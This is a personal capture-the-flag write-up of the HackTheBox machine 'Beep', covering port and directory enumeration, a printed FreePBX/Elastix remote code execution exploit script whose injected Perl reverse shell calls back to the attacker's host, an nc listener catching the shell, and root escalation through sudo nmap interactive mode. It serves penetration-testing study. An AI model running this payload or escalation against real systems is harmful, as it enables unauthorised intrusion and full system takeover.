TJ_Null’s OSCP Prep – HTB – Beep

Beep is a linux machine which has alot of ports open, so enumeration took along time. There were many ways to exploit this machine, and getting root as well. However I’ll not show all of them. The webserver is running a vulnerable version of Elastix, which result in RCE. The low privileged user could run many commands as sudo, giving us alot of option to escalate our privilege.

---

Enumeration

I’ll first stat with an nmap scan.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# nmap -sC -sV -p- --min-rate 10000 -oN nmap.result 10.10.10.7
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 15:29 EST
Stats: 0:01:41 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 93.75% done; ETC: 15:31 (0:00:06 remaining)
Nmap scan report for 10.10.10.7
Host is up (0.030s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: APOP LOGIN-DELAY(0) STLS PIPELINING UIDL USER RESP-CODES AUTH-RESP-CODE IMPLEMENTATION(Cyrus POP3 server v2) TOP EXPIRE(NEVER)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_imap-capabilities: BINARY Completed THREAD=ORDEREDSUBJECT LIST-SUBSCRIBED ACL UIDPLUS OK STARTTLS URLAUTHA0001 SORT=MODSEQ IMAP4 CATENATE CHILDREN IDLE MULTIAPPEND CONDSTORE X-NETSCAPE NAMESPACE UNSELECT MAILBOX-REFERRALS SORT LISTEXT RIGHTS=kxte ANNOTATEMORE ID RENAME NO IMAP4rev1 LITERAL+ THREAD=REFERENCES ATOMIC QUOTA
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_http-server-header: Apache/2.2.3 (CentOS)
|_ssl-date: 2022-01-19T21:34:53+00:00; +1h01m51s from scanner time.
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_http-title: Elastix - Login page
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 1h01m50s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 316.87 seconds

There were many ports open. To make it easier to see all open ports, I ran a new scan with nmap, leaving out version and default scripts.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# nmap -p- --min-rate 10000 10.10.10.7                                                               
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-20 14:24 EST
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.068s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
443/tcp   open  https
878/tcp   open  unknown
993/tcp   open  imaps
995/tcp   open  pop3s
3306/tcp  open  mysql
4190/tcp  open  sieve
4445/tcp  open  upnotifyp
4559/tcp  open  hylafax
5038/tcp  open  unknown
10000/tcp open  snet-sensor-mgmt

Enumerating all these ports took some time. So lets take a look at the webserver running on port 80.

The webserver redirects us to HTTPS. The webserver is running Elastix. Elastix is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. That explains all the open ports on these machine.

Running a gobuster scan against port 80. -k for skipping SSL cert verification, otherwise the scan will fail.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirb/big.txt -k 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

/.htaccess            (Status: 403) [Size: 287]
/.htpasswd            (Status: 403) [Size: 287]
/admin                (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/cgi-bin/             (Status: 403) [Size: 286]                                
/configs              (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/favicon.ico          (Status: 200) [Size: 894]                                  
/help                 (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]   
/images               (Status: 301) [Size: 310] [--> https://10.10.10.7/images/] 
/lang                 (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]   
/libs                 (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]   
/mail                 (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]   
/modules              (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/panel                (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]  
/recordings           (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
/robots.txt           (Status: 200) [Size: 28]                                      
/static               (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]    
/themes               (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]    
/var                  (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]       
/vtigercrm            (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/] 
                                                                                    
===============================================================
2022/01/21 14:45:53 Finished
===============================================================

Going to /admin we are prompted with a popup login. Clicking cancel, we are redirected to this page.

So we can see that the webserver is also running FreePBX 2.8.1.4.

From a forum post I saw, it explained the difference between FreePBX and Elastix.

Asterisk started it all, and is the base platform switch under the covers handling the main switch funtions.

Freepbx came along to make it easier to use GUI with some extra tools. Huge for new users.

Elastix leveraged Freepbx version and added applications like the call center that enables you to manage large call groups effectively. They also packaged several other great products with the platform to make the install a complete business communicaitons platform.

https://www.elastix.org/community/threads/difference-between-elastix-freepbx-and-asterisk.115899/

Initial Access

There is a vulnerability in FreePBX/Elastix which can give us RCE.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# cat 18650.py 
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
import urllib
import ssl
rhost="localhost"
lhost="10.10.14.17"
lport=4444
extension="233"

ssl._create_default_https_context = ssl._create_unverified_context

# Reverse shell payload

url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url)

In order for this script to work, we have to do a couple of things. Since this server is so old, the SSL cert is no longer valid an throws error at us. You can either strip ssl, or redirect traffic from localhost to 10.10.10.7:443 through burpsuite.

Then you have to find the exisiting extension line. Using sipvicious svwar.py script, we could easily find it.

┌──(root💀kali)-[/home/…/HTB/beep/sipvicious/sipvicious]
└─# python3 svwar.py -m INVITE -e100-500 10.10.10.7     
| Extension | Authentication |
------------------------------
| 233       | reqauth        |

Starting a NC listener and runing the script will give us a connection.

┌──(root💀kali)-[/home/aghanim]
└─# nc -lvnp 4444                     
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.7] 54087
whoami
asterisk

Root

Running sudo -l as asterisk gave us a list of commands the user can run as sudo.

bash-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

bash-3.2$ sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# 

What I’ve learned

• This box was kind of overwhelming with how many ways there was to get shell, as well as all the ports open. Understanding the connection between all the open ports is important.
• Focusing on ports I know and not doing too much as the same time will surely increase my effectiveness.
• Before doing an exploit, finish with the enumeration stage. Document everything in a note taking app. I use Obsidian for that, which is an amazing note taking tool that uses markdown language.